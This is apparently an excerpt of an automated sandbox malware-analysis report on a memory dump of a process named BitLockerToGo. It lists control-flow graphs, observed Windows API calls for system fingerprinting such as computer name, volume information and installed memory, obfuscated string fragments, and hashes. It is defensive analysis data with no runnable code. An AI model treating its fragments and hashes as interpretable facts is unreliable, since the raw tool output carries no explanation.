                                                                                    control_flow_graph 13 420720-420765 call 43bc90 16 42076b-4207c8 call 414590 call 438090 13->16 17 420f0f-420f1f 13->17 22 4207ca-4207cd 16->22 23 4207cf-4207fb 22->23 24 4207fd-420801 22->24 23->22 25 420803-42080e 24->25 26 420810 25->26 27 420815-42082e 25->27 28 4208cd-4208d0 26->28 29 420830 27->29 30 420835-420840 27->30 33 4208d2 28->33 34 4208d4-4208df 28->34 31 4208bc-4208c1 29->31 30->31 32 420842-4208b2 call 439af0 30->32 36 4208c3 31->36 37 4208c5-4208c8 31->37 42 4208b7 32->42 33->34 38 420e36-420e68 call 4380e0 34->38 39 4208e5-4208f5 34->39 36->28 37->25 47 420e6a-420e6d 38->47 40 4208f7-420917 39->40 43 420b3a-420b3d 40->43 44 42091d-42093e 40->44 42->31 48 420b43-420b59 call 438090 43->48 49 420b3f-420b41 43->49 46 420945-420948 44->46 50 42094a-42099a 46->50 51 42099c-4209ba call 420f20 46->51 52 420e6f-420e9b 47->52 53 420e9d-420ea1 47->53 61 420b5b-420b6f 48->61 62 420b5d-420b68 48->62 54 420b71-420b73 49->54 50->46 51->43 73 4209c0-4209e9 51->73 52->47 59 420ea3-420eae 53->59 56 420b79-420b9a 54->56 57 420e0d-420e18 54->57 63 420b9e-420ba1 56->63 67 420e1a-420e24 57->67 68 420e1c-420e20 57->68 65 420eb2-420ec7 59->65 66 420eb0 59->66 61->54 70 420e28-420e2c 62->70 71 420c13-420c48 63->71 72 420ba3-420c11 63->72 75 420ecb-420ed6 65->75 76 420ec9 65->76 74 420f06-420f0b 66->74 78 420e26 67->78 68->78 70->40 79 420e32-420e34 70->79 81 420c4a-420c4d 71->81 72->63 82 4209eb-4209ee 73->82 74->17 83 420efa-420efd 75->83 84 420ed8-420ef5 call 439af0 75->84 76->83 78->70 79->38 88 420c4f-420c7b 81->88 89 420c7d-420c81 81->89 90 4209f0-420a57 82->90 91 420a59-420a7c call 420f20 82->91 86 420f01-420f04 83->86 87 420eff 83->87 84->83 86->59 87->74 88->81 93 420c83-420c8e 89->93 90->82 100 420a83-420a9a 91->100 101 420a7e 91->101 96 420c90 93->96 97 420c95-420caa 93->97 99 420d51-420d54 96->99 102 420cb1-420cbc 97->102 103 420cac 97->103 106 420d56 99->106 107 420d58-420d77 99->107 108 420a9e-420b38 call 407fd0 call 414210 call 407fe0 100->108 109 420a9c 100->109 101->43 104 420d42-420d45 102->104 105 420cc2-420d38 call 439af0 102->105 103->104 112 420d47 104->112 113 420d49-420d4c 104->113 115 420d3d 105->115 106->107 114 420d79-420d7c 107->114 108->43 109->108 112->99 113->93 117 420da3-420da9 114->117 118 420d7e-420da1 114->118 115->104 120 420dd7-420de3 117->120 121 420dab-420daf 117->121 118->114 122 420df6-420df8 120->122 123 420de5-420df4 call 4380e0 120->123 125 420db1-420db8 121->125 127 420dfa-420e03 122->127 123->127 128 420dba-420dc6 125->128 129 420dc8-420dcb 125->129 127->57 134 420e05-420e0b 127->134 128->125 130 420dd3-420dd5 129->130 131 420dcd 129->131 130->120 131->130 134->70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !@$,$A$A$B$B$C$C$D$D$DABCD$a$v
                                                                                    • API String ID: 0-4069001718
                                                                                    • Opcode ID: d24c0bf20b5cfa0d2cb17c6ee7a9234297006efc58071f83e46e167ed2a4bede
                                                                                    • Instruction ID: 6c52679abcfbc30870106b065bba07298c4f65f03cefc9d75d065d86b06c63aa
                                                                                    • Opcode Fuzzy Hash: d24c0bf20b5cfa0d2cb17c6ee7a9234297006efc58071f83e46e167ed2a4bede
                                                                                    • Instruction Fuzzy Hash: 3622027160C3A08FD3248B68D49136FBBE1ABC5314F598A2EE5D687383D6BD8845C74B

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 144 42a03c-42a098 call 43b5e0 GetComputerNameExA 147 42a0a0-42a0c5 144->147 147->147 148 42a0c7-42a0d1 147->148 149 42a0d3-42a0da 148->149 150 42a0eb-42a0f8 148->150 151 42a0e0-42a0e9 149->151 152 42a0fa-42a101 150->152 153 42a11b-42a173 GetComputerNameExA 150->153 151->150 151->151 155 42a110-42a119 152->155 154 42a180-42a1d7 153->154 154->154 156 42a1d9-42a1e3 154->156 155->153 155->155 157 42a1e5-42a1ef 156->157 158 42a1fb-42a20b 156->158 159 42a1f0-42a1f9 157->159 160 42a22b-42a282 158->160 161 42a20d-42a214 158->161 159->158 159->159 164 42a290-42a2dc 160->164 162 42a220-42a229 161->162 162->160 162->162 164->164 165 42a2de-42a2e8 164->165 166 42a2ea-42a2f1 165->166 167 42a30b-42a318 165->167 168 42a300-42a309 166->168 169 42a31a-42a321 167->169 170 42a33b-42a397 call 43b5e0 167->170 168->167 168->168 171 42a330-42a339 169->171 175 42a3a0-42a3de 170->175 171->170 171->171 175->175 176 42a3e0-42a3ea 175->176 177 42a40b-42a452 call 408e00 176->177 178 42a3ec-42a3f3 176->178 182 42a460-42a48c 177->182 179 42a400-42a409 178->179 179->177 179->179 182->182 183 42a48e-42a49a 182->183 184 42a4bb-42a4be call 42e710 183->184 185 42a49c-42a4a3 183->185 188 42a4c3-42a4e2 184->188 186 42a4b0-42a4b9 185->186 186->184 186->186
                                                                                    APIs
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042A070
                                                                                    • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042A141
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerName
                                                                                    • String ID: 5+$)'->$Yysw$p.
                                                                                    • API String ID: 3545744682-3271381888
                                                                                    • Opcode ID: 7bc9d37edc3057e610e15797e311d901a77cf4983808ab4ed45449bae220d780
                                                                                    • Instruction ID: a0bfec2fd4801fa297db708dd0ce194928d6281eb9dfd43985bf1e531d4ceda7
                                                                                    • Opcode Fuzzy Hash: 7bc9d37edc3057e610e15797e311d901a77cf4983808ab4ed45449bae220d780
                                                                                    • Instruction Fuzzy Hash: 63B1013050C3D18BD7358F3998A17ABBBD19F97314F5888AED5C98B382D779400A8B67

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 189 40e2d5-40e2ff call 409630 193 40e300-40e314 189->193 193->193 194 40e316-40e329 193->194 195 40e330-40e355 194->195 195->195 196 40e357-40e3b4 195->196 197 40e3c0-40e400 196->197 197->197 198 40e402-40e413 197->198 199 40e415-40e41f 198->199 200 40e42b-40e433 198->200 201 40e420-40e429 199->201 202 40e435-40e436 200->202 203 40e44b-40e455 200->203 201->200 201->201 204 40e440-40e449 202->204 205 40e457-40e45b 203->205 206 40e46b-40e473 203->206 204->203 204->204 207 40e460-40e469 205->207 208 40e475-40e476 206->208 209 40e48b-40e495 206->209 207->206 207->207 210 40e480-40e489 208->210 211 40e497-40e49b 209->211 212 40e4ab-40e4b7 209->212 210->209 210->210 213 40e4a0-40e4a9 211->213 214 40e4d1-40e60f 212->214 215 40e4b9-40e4bb 212->215 213->212 213->213 217 40e610-40e651 214->217 216 40e4c0-40e4cd 215->216 216->216 218 40e4cf 216->218 217->217 219 40e653-40e68f 217->219 218->214 220 40e690-40e6c0 219->220 220->220 221 40e6c2-40e72f call 40b610 call 409630 CoUninitialize 220->221 226 40e730-40e744 221->226 226->226 227 40e746-40e759 226->227 228 40e760-40e785 227->228 228->228 229 40e787-40e7e4 228->229 230 40e7f0-40e82f 229->230 230->230 231 40e831-40e842 230->231 232 40e844-40e84b 231->232 233 40e85b-40e863 231->233 234 40e850-40e859 232->234 235 40e865-40e866 233->235 236 40e87b-40e885 233->236 234->233 234->234 237 40e870-40e879 235->237 238 40e887-40e88b 236->238 239 40e89b-40e8a3 236->239 237->236 237->237 240 40e890-40e899 238->240 241 40e8a5-40e8a6 239->241 242 40e8bb-40e8c5 239->242 240->239 240->240 245 40e8b0-40e8b9 241->245 243 40e8c7-40e8cb 242->243 244 40e8db-40e8e7 242->244 246 40e8d0-40e8d9 243->246 247 40e901-40ea1b 244->247 248 40e8e9-40e8eb 244->248 245->242 245->245 246->244 246->246 250 40ea20-40ea61 247->250 249 40e8f0-40e8fd 248->249 249->249 251 40e8ff 249->251 250->250 252 40ea63-40ea84 250->252 251->247 253 40ea90-40eac0 252->253 253->253 254 40eac2-40eb0b call 40b610 253->254
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Uninitialize
                                                                                    • String ID: ";G$d<$l$nv$tr
                                                                                    • API String ID: 3861434553-995644117
                                                                                    • Opcode ID: 8677d267741a8d6fd2b04c2b67c7019589f9450b38e70caaeb5818bcc74a52c9
                                                                                    • Instruction ID: df48264671a07a49878f384e58ab6bb208ea46f082ef2c8c8ba53de654e0de4f
                                                                                    • Opcode Fuzzy Hash: 8677d267741a8d6fd2b04c2b67c7019589f9450b38e70caaeb5818bcc74a52c9
                                                                                    • Instruction Fuzzy Hash: 1612AE7550D3D08BD3328F2688906EBBFE1ABD7304F184A6DD4C95B392C73A5909CB96

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 257 4353a0-4353c2 258 4353d0-43542b 257->258 258->258 259 43542d-43543a 258->259 260 435440-43546c 259->260 260->260 261 43546e-4354af 260->261 262 4354b0-4354d5 261->262 262->262 263 4354d7-4354f3 262->263 265 4355ab-4355b6 263->265 266 4354f9-435504 263->266 267 4355c0-4355f7 265->267 268 435510-435549 266->268 267->267 269 4355f9-435650 267->269 268->268 270 43554b-43555f 268->270 274 435a77-435aa0 call 43b5e0 GetVolumeInformationW 269->274 275 435656-43568f 269->275 271 435560-43559c 270->271 271->271 273 43559e-4355a8 271->273 273->265 280 435aa2-435aa6 274->280 281 435aaa-435aac 274->281 276 435690-4356c3 275->276 276->276 278 4356c5-4356f2 SysAllocString 276->278 286 435a67-435a73 278->286 287 4356f8-435712 CoSetProxyBlanket 278->287 280->281 282 435abd-435ac8 281->282 284 435ad4-435aef 282->284 285 435aca-435ad1 282->285 288 435af0-435b25 284->288 285->284 286->274 289 435718-435736 287->289 290 435a5d-435a63 287->290 288->288 291 435b27-435b45 288->291 293 435740-43576f 289->293 290->286 294 435b50-435b77 291->294 293->293 295 435771-4357e7 293->295 294->294 296 435b79-435ba1 call 41d4b0 294->296 299 4357f0-435830 295->299 302 435bb0-435bb8 296->302 299->299 301 435832-435866 299->301 311 435a47-435a59 301->311 312 43586c-43588e 301->312 302->302 303 435bba-435bc8 302->303 305 435ab0-435ab7 303->305 306 435bce-435bde call 408060 303->306 305->282 307 435be3-435bea 305->307 306->305 311->290 315 435894-435897 312->315 316 435a3d-435a43 312->316 315->316 318 43589d-4358a2 315->318 316->311 318->316 319 4358a8-4358f3 318->319 321 435900-435930 319->321 321->321 322 435932-435944 321->322 323 435948-43594a 322->323 324 435950-435956 323->324 325 435a28-435a39 323->325 324->325 326 43595c-43596a 324->326 325->316 327 4359b7 326->327 328 43596c-435971 326->328 331 4359b9-4359eb call 407fd0 call 408e00 327->331 330 435996-43599a 328->330 332 435980-435988 330->332 333 43599c-4359a5 330->333 343 4359f2-4359fe 331->343 344 4359ed 331->344 336 43598b-435994 332->336 337 4359a7-4359aa 333->337 338 4359ac-4359b0 333->338 336->330 336->331 337->336 338->336 341 4359b2-4359b5 338->341 341->336 345 435a00 343->345 346 435a05-435a25 call 408000 call 407fe0 343->346 344->343 345->346 346->325
                                                                                    APIs
                                                                                    • SysAllocString.OLEAUT32(845C8253), ref: 004356CA
                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043570A
                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00435A9C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocBlanketInformationProxyStringVolume
                                                                                    • String ID: 4=>?$Ri
                                                                                    • API String ID: 2230333033-1281010762
                                                                                    • Opcode ID: b20d8bb7b98530e4b535255ff4ea33fe897a94bcb5ba4787325f79f25bd3d770
                                                                                    • Instruction ID: 7fd69b617c57492c6cc3a4850a10533796f215261fd1a1bde8e14e6a6fa4f0a4
                                                                                    • Opcode Fuzzy Hash: b20d8bb7b98530e4b535255ff4ea33fe897a94bcb5ba4787325f79f25bd3d770
                                                                                    • Instruction Fuzzy Hash: 64220D72A083109BD310DF68CC81B9BBBE1EFC9314F19892DE985DB391D679D805CB96

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 351 435090-4350c4 call 4145b0 354 4350c6-4350c9 351->354 355 4350cb-4350ea 354->355 356 4350ec-435107 354->356 355->354 357 435109-43510c 356->357 358 435139-43513c 357->358 359 43510e-435137 357->359 360 43513e-435149 358->360 359->357 361 43514b 360->361 362 43514d-435162 360->362 363 4351ba-4351bd 361->363 364 435166-435171 362->364 365 435164 362->365 368 4351c1-4351cb 363->368 369 4351bf 363->369 366 4351ae-4351b1 364->366 367 435173-4351a9 call 439af0 364->367 365->366 373 4351b3 366->373 374 4351b5-4351b8 366->374 367->366 370 4351d2-4351f0 368->370 371 4351cd 368->371 369->368 376 4351f2-4351f5 370->376 375 43538d-43539a 371->375 373->363 374->360 378 435222-435225 376->378 379 4351f7-435220 376->379 380 435227-435232 378->380 379->376 381 435234 380->381 382 435239-435251 380->382 383 4352bb-4352be 381->383 384 435253 382->384 385 435255-435260 382->385 386 4352c2-4352c7 383->386 387 4352c0 383->387 388 4352ab-4352af 384->388 385->388 389 435262-43529e call 439af0 385->389 390 4352d5-4352f3 386->390 391 4352c9-4352d2 386->391 387->386 393 4352b3-4352b6 388->393 394 4352b1 388->394 396 4352a3-4352a6 389->396 395 4352f5-4352f8 390->395 391->390 393->380 394->383 397 435325-435328 395->397 398 4352fa-435323 395->398 396->388 399 43532a-435330 397->399 398->395 400 435332 399->400 401 435334-435346 399->401 402 43538b 400->402 403 43534a-435350 401->403 404 435348 401->404 402->375 405 43537f-435382 403->405 406 435352-43537c call 439af0 403->406 404->405 407 435386-435389 405->407 408 435384 405->408 406->405 407->399 408->402
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: A$B$C$D$DCBADCBA
                                                                                    • API String ID: 0-3740881347
                                                                                    • Opcode ID: adecac1cb3f50ce779c15c6944098ec97546d2522254e89f39d4e12291314d8a
                                                                                    • Instruction ID: 63b755127d4de6a4aad4bad12af58016d43057d5d69cefd924e5173af3b20b52
                                                                                    • Opcode Fuzzy Hash: adecac1cb3f50ce779c15c6944098ec97546d2522254e89f39d4e12291314d8a
                                                                                    • Instruction Fuzzy Hash: 2AA16A31E08654CFDB04CBBCC4513AE7BF1AB4A310F1851AED886A73D2C27D8941CB9A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 440 40dca0-40dcb7 441 40dcc0-40dce5 440->441 441->441 442 40dce7-40dd17 call 401b70 441->442 445 40dd20-40dd6c 442->445 445->445 446 40dd6e-40dd88 call 401b70 445->446 449 40dd90-40ddb5 446->449 449->449 450 40ddb7-40de2f call 401b70 call 4353a0 call 40ed40 449->450 457 40de30-40de53 450->457 457->457 458 40de55-40de67 457->458 459 40de91-40deaf 458->459 460 40de69-40de77 458->460 462 40deb0-40ded5 459->462 461 40de80-40de8f 460->461 461->459 461->461 462->462 463 40ded7-40df07 call 401b70 462->463 466 40df10-40df5c 463->466 466->466 467 40df5e-40df7f call 401b70 466->467 470 40df80-40dfa5 467->470 470->470 471 40dfa7-40dfc0 call 401b70 call 4353a0 470->471 475 40dfc5-40e01f call 40ed40 471->475 478 40e020-40e043 475->478 478->478 479 40e045-40e057 478->479 480 40e081-40e0a0 479->480 481 40e059-40e067 479->481 482 40e070-40e07f 481->482 482->480 482->482
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 9=$@bq$@bq
                                                                                    • API String ID: 0-316456066
                                                                                    • Opcode ID: c1347c468daa831ee71e5dae199c1662b49994abf4336e13dcc994518d840b24
                                                                                    • Instruction ID: 35755ea2fee2548ef166cf2072f2c04e5b5edc333876189fadc4d885ac75e1d3
                                                                                    • Opcode Fuzzy Hash: c1347c468daa831ee71e5dae199c1662b49994abf4336e13dcc994518d840b24
                                                                                    • Instruction Fuzzy Hash: 10918D35A083514BC3249B25C8517EFBBE2EFDA314F08CA3DD4C9A7382DA785805879B

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 483 42a80b-42a83f 484 42a840-42a85a 483->484 484->484 485 42a85c-42a866 484->485 486 42a87b-42a883 485->486 487 42a868-42a86f 485->487 489 42a885 486->489 490 42a89c-42a8af 486->490 488 42a870-42a879 487->488 488->486 488->488 491 42a890-42a89a 489->491 492 42a8b0-42a8ca 490->492 491->490 491->491 492->492 493 42a8cc-42a8db 492->493 494 42a927-42a941 493->494 495 42a8dd-42a8e5 493->495 496 42a8f0-42a8f7 495->496 497 42a900-42a906 496->497 498 42a8f9-42a8fc 496->498 497->494 500 42a908-42a91f call 439af0 497->500 498->496 499 42a8fe 498->499 499->494 502 42a924 500->502 502->494
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: <#:Z$DCBA$IO{B
                                                                                    • API String ID: 2994545307-3001781657
                                                                                    • Opcode ID: eb4e246fcae7f77e475b20ab0a4315972cd4437c3f998053f4b5719bcf771401
                                                                                    • Instruction ID: e8f0e9b6a8d6456f061768eb9e0068afe562bbdc9d967e798bf7ba60a950b8bf
                                                                                    • Opcode Fuzzy Hash: eb4e246fcae7f77e475b20ab0a4315972cd4437c3f998053f4b5719bcf771401
                                                                                    • Instruction Fuzzy Hash: 133169746083918FD7248B35A861B7BFBE0EF93304F58196CD0CA97293D3354812870E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 507 42a749-42b976 call 42fd30 call 407fe0 513 42b980-42b9bf 507->513 513->513 514 42b9c1-42b9cb 513->514 515 42b9ed 514->515 516 42b9cd-42b9d6 514->516 517 42b9ef-42b9fb 515->517 518 42b9e0-42b9e9 516->518 519 42ba11-42ba5b call 43b5e0 GetPhysicallyInstalledSystemMemory call 41d4b0 517->519 520 42b9fd-42b9ff 517->520 518->518 521 42b9eb 518->521 527 42ba60-42ba7a 519->527 522 42ba00-42ba0d 520->522 521->517 522->522 524 42ba0f 522->524 524->519 528 42ba80-42bab1 527->528 528->528 529 42bab3-42bae3 528->529 530 42baf0-42bb23 529->530 530->530 531 42bb25-42bb2f 530->531 532 42bb31-42bb3f 531->532 533 42bb4d 531->533 535 42bb40-42bb49 532->535 534 42bb51-42bb59 533->534 536 42bb6b-42bb78 534->536 537 42bb5b-42bb5f 534->537 535->535 538 42bb4b 535->538 540 42bb7a-42bb81 536->540 541 42bb9b-42bbef 536->541 539 42bb60-42bb69 537->539 538->534 539->536 539->539 542 42bb90-42bb99 540->542 543 42bbf0-42bc0a 541->543 542->541 542->542 543->543 544 42bc0c-42bc16 543->544 545 42bc2b-42bc38 544->545 546 42bc18-42bc1f 544->546 548 42bc3a-42bc41 545->548 549 42bc5b-42bd01 545->549 547 42bc20-42bc29 546->547 547->545 547->547 550 42bc50-42bc59 548->550 550->549 550->550
                                                                                    APIs
                                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042BA40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                    • String ID: wH
                                                                                    • API String ID: 3960555810-1503671404
                                                                                    • Opcode ID: 735eff78948b21e92c26272058e6777a53df9390db2d3b00e6e92735ac06b047
                                                                                    • Instruction ID: 6938ec21c2c950272ecf71514532c80e00f36c867636421e33f396b57224f4d7
                                                                                    • Opcode Fuzzy Hash: 735eff78948b21e92c26272058e6777a53df9390db2d3b00e6e92735ac06b047
                                                                                    • Instruction Fuzzy Hash: F6A1067190C3E18BD335CF2994603ABBBE1AFD6304F58896ED4C997382D7398905CB96

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 551 43ccd0-43ccdf 552 43cd03-43cd0c 551->552 553 43cce1 551->553 555 43cd13-43cd29 552->555 556 43cd0e-43cd11 552->556 554 43ccf0-43ccf8 553->554 554->554 558 43ccfa-43ccfd 554->558 557 43cd30-43cd4f 555->557 556->555 557->557 559 43cd51-43cd67 557->559 558->552 560 43cd70-43cd93 559->560 560->560 561 43cd95-43cda2 560->561 562 43cdb0-43cdcc 561->562 562->562 563 43cdce-43cdd9 562->563 564 43ce31-43ce42 563->564 565 43cddb-43cde5 563->565 567 43ce50-43ce7b 564->567 566 43cdf0-43cdf7 565->566 569 43ce02-43ce0a 566->569 570 43cdf9-43cdfc 566->570 567->567 568 43ce7d-43ceaf call 438090 567->568 576 43ceb0-43cef2 568->576 569->564 573 43ce0c-43ce27 call 439af0 569->573 570->566 572 43cdfe-43ce00 570->572 572->564 577 43ce2c-43ce2f 573->577 576->576 578 43cef4-43cf01 576->578 577->564 579 43cf10-43cf2c 578->579 579->579 580 43cf2e-43cf39 579->580 581 43cf62-43cf66 580->581 582 43cf3b-43cf49 580->582 584 43cf9d-43cfab 581->584 583 43cf50-43cf57 582->583 587 43cf59-43cf5c 583->587 588 43cf68-43cf70 583->588 585 43cfb2-43cfc5 584->585 586 43cfad-43cfb0 584->586 589 43cfc7 585->589 590 43cfc9-43cff0 585->590 586->585 587->583 591 43cf5e-43cf60 587->591 588->584 592 43cf72-43cf91 call 439af0 588->592 589->590 591->584 594 43cf96-43cf9b 592->594 594->584
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: ;:;<$
                                                                                    • API String ID: 2994545307-1755626032
                                                                                    • Opcode ID: ceafabc97ec7fc7112a437cbd8cc7f09de2b8a4465da014b00e24afc39a8be1b
                                                                                    • Instruction ID: 8782bf9c27d267b7fc4d337e2a4af93988c98bab6341f267782e84b0f748c24c
                                                                                    • Opcode Fuzzy Hash: ceafabc97ec7fc7112a437cbd8cc7f09de2b8a4465da014b00e24afc39a8be1b
                                                                                    • Instruction Fuzzy Hash: 9F816835A083208BC7288F24C89156BB7E2EBCA314F19963DE9D527391DB78AC06C7C5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: 36;$DCBA
                                                                                    • API String ID: 2994545307-4072228999
                                                                                    • Opcode ID: 846f1ea104b691330629432e4b6e43d1e5b34a174913de7ac9d48f18eb5c0a97
                                                                                    • Instruction ID: 9bf3ba9eda82bb025300ab767993d6347617181220c3ac0ccfdd0acfe32fd49b
                                                                                    • Opcode Fuzzy Hash: 846f1ea104b691330629432e4b6e43d1e5b34a174913de7ac9d48f18eb5c0a97
                                                                                    • Instruction Fuzzy Hash: E2717D70B047205BD7149F24EC8273BB3A2EF81318F98943EE58687356E67C9C46835E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: nq[P$rq[P
                                                                                    • API String ID: 2994545307-2909691123
                                                                                    • Opcode ID: 6284779297c15d92aad6113c9a59f44f615f4a62402be2677d1ef626f2a7c62b
                                                                                    • Instruction ID: b607d9503db8f49fc5eb3f4a9d08a94e19dddf56f676e5841e6c9b2ad61a41b1
                                                                                    • Opcode Fuzzy Hash: 6284779297c15d92aad6113c9a59f44f615f4a62402be2677d1ef626f2a7c62b
                                                                                    • Instruction Fuzzy Hash: A451E536E501558FDB18CF28CC815BEB763FBC9310F2A5269D592A7356CB78AC02C798
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0040897D
                                                                                      • Part of subcall function 0040C7C0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C7D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitInitializeProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2609639641-0
                                                                                    • Opcode ID: 136d881544a2c7f1eb5d7367689f2f39444c52998d38312927c5dd3fbafc190d
                                                                                    • Instruction ID: a3c9cdf773126fedba7df58947f448d54cdc7de01630728f9ef541fa2631cfdd
                                                                                    • Opcode Fuzzy Hash: 136d881544a2c7f1eb5d7367689f2f39444c52998d38312927c5dd3fbafc190d
                                                                                    • Instruction Fuzzy Hash: 39714873F047105BC318EF6DCD4236AB6D6ABC4714F1E813EA899EB3D5E9788C058685
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 427495900a7145ea173e7ebee0b20d127a89716492d901b63fbb4ec0d38616dd
                                                                                    • Instruction ID: 3bdbc8e58166466a9f9bae358622bf9d35e8043e6c3f614e9619826742381d86
                                                                                    • Opcode Fuzzy Hash: 427495900a7145ea173e7ebee0b20d127a89716492d901b63fbb4ec0d38616dd
                                                                                    • Instruction Fuzzy Hash: 1641D5B69083419FC720CF28C4817ABB7D2AF95304F194A2EE0D9C7342D739D996CB56
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0043BC68,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439B1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
